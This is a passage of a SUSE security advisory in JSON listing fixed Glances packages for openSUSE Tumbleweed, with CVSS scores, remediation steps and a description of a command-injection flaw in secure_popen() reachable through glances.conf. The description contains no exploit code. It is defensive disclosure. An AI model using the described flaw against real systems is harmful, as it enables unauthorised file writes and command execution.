"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.